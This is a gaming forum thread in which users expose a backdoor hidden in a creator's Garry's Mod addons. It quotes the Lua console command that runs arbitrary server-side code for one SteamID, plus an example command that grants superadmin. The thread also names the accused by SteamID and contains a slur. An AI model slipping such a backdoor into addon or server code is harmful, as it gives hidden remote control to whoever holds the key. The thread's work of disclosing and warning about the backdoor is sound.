1. Post #1
    CyberGmod Founder PropHuntv2 Home
    May 2009
    989 Posts
    Just a heads up, he's (STEAM_0:1:18914322) backdooring a few of his addon's that he stole from various places with:

local g = "hissteamid"
    concommand.Add("_gus", function(ply, c,a) if(ply:SteamID() == g) then RunString(a[1] or "") end end)

For those that don't know, this allows you to pass anything to _gus, and it will execute it serverside, for example:

Code:
    RunConsoleCommand("ulx adduser gus superadmin")
    Wiki Page
    The possibilities are endless, and it's a backdoor into your server.

sv_tags also gets edited so he can find you pretty easily by searching for the tag, so just a heads up.

One example:
    http://www.garrysmod.org/downloads/?a=view&id=129950

Don't know if any mods can take down his addons and suspend his GMod.org access, but he's been blatantly abusing it to shut other servers down.
    (He runs his own community called 1944RP, so he should have some sense.)

I'm sick and tired of people abusing gmod.org to shove backdoors into scripts.

Edited:

Garry sorted it, apparently.
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Winner Winner x 13Funny Funny x 2Friendly Friendly x 2 (list)

2. Post #2
    Gold Member
    May 2010
    409 Posts
    This guy has always been quite a douche :/

This doesn't surprise me. Tho its nice to see people discovering this and posting it public to get rid of these people.
    Reply With Quote Edit / Delete Reply Windows 7 Denmark Show Events Agree Agree x 9 (list)

3. Post #3
    October 2008
    1,316 Posts
    would have been nice if you would have posted his steam ID just so I can ban him now and get it over with.
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Agree Agree x 1 (list)

4. Post #4
    PROUD BRONY 4LYFE
    February 2009
    3,312 Posts
    STEAM_0:1:18914322

Also here's a perma link to his Steam profile, incase he changes his custom URL.

http://steamcommunity.com/profiles/76561197998094373
    Reply With Quote Edit / Delete Reply Windows Vista United Kingdom Show Events Winner Winner x 5Informative Informative x 2Useful Useful x 2 (list)

5. Post #5
    May 2009
    989 Posts
    STEAM_0:1:18914322

Also here's a perma link to his Steam profile, incase he changes his custom URL.

http://steamcommunity.com/profiles/76561197998094373
    Updated OP.
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Friendly Friendly x 1 (list)

6. Post #6
    peopleofgaming.com
    January 2009
    1,087 Posts
    Just adding this in, GustavGR enjoys joining other servers and stealing their HUD from the cache, then rebranding it and selling it.
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Funny Funny x 5 (list)

7. Post #7
    May 2009
    989 Posts
    Just adding this in, GustavGR enjoys joining other servers and stealing their HUD from the cache, then rebranding it and selling it.
    Yeah, he didn't do it with mine, because I deliberately released it

8. Post #8
    I call in friends to rate KatNotDinner dumb (lol)
    December 2011
    1,651 Posts
    I always knew he was a faggot, glad we have evidence in solid code now!

Good effort mate.
    Reply With Quote Edit / Delete Reply Windows 7 Australia Show Events Dumb Dumb x 1 (list)

9. Post #9
    Blue and Proud Of It.
    Dennab
    September 2011
    961 Posts
    Thank You OP, You have got rid of a complete asshole from GMod.
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Optimistic Optimistic x 3Dumb Dumb x 1 (list)

10. Post #10
    Noi
    Purrr ~
    February 2010
    1,225 Posts
    Reminds me some wiremod addon, E2Power, that checks "banlist" from author's own website and kicks unwanted players.
    Reply With Quote Edit / Delete Reply Windows 8 Russian Federation Show Events Funny Funny x 3 (list)

11. Post #11
    December 2008
    740 Posts
    Reminds me some wiremod addon, E2Power, that checks "banlist" from author's own website and kicks unwanted players.
    Code:
    function E2Power_GetBanList()
    		http.Get("http://fertnon.narod2.ru/e2power_bans.txt","",function(contents)
    			E2Power_BanList=contents

local players = player.GetAll()

for _, player in ipairs( players ) do
    				if string.find(E2Power_BanList,player:SteamID(),1,true) then player:Kick("you are banned!") end
    			end

end)
    	end
    :)
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Funny Funny x 5 (list)

12. Post #12
    PENISCORP DIRECTOR
    August 2007
    3,110 Posts
    Hahaha, it's even flawed - if your SteamID is "STEAM_0:1:4201460" - even though the banlist entry is "STEAM_0:1:42014600" you'll be kicked
    Reply With Quote Edit / Delete Reply Windows 7 Spain Show Events Funny Funny x 2Winner Winner x 1Zing Zing x 1Agree Agree x 1 (list)

13. Post #13
    taste the salty dong
    September 2009
    1,822 Posts
    Isnt he formatme?
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Funny Funny x 1 (list)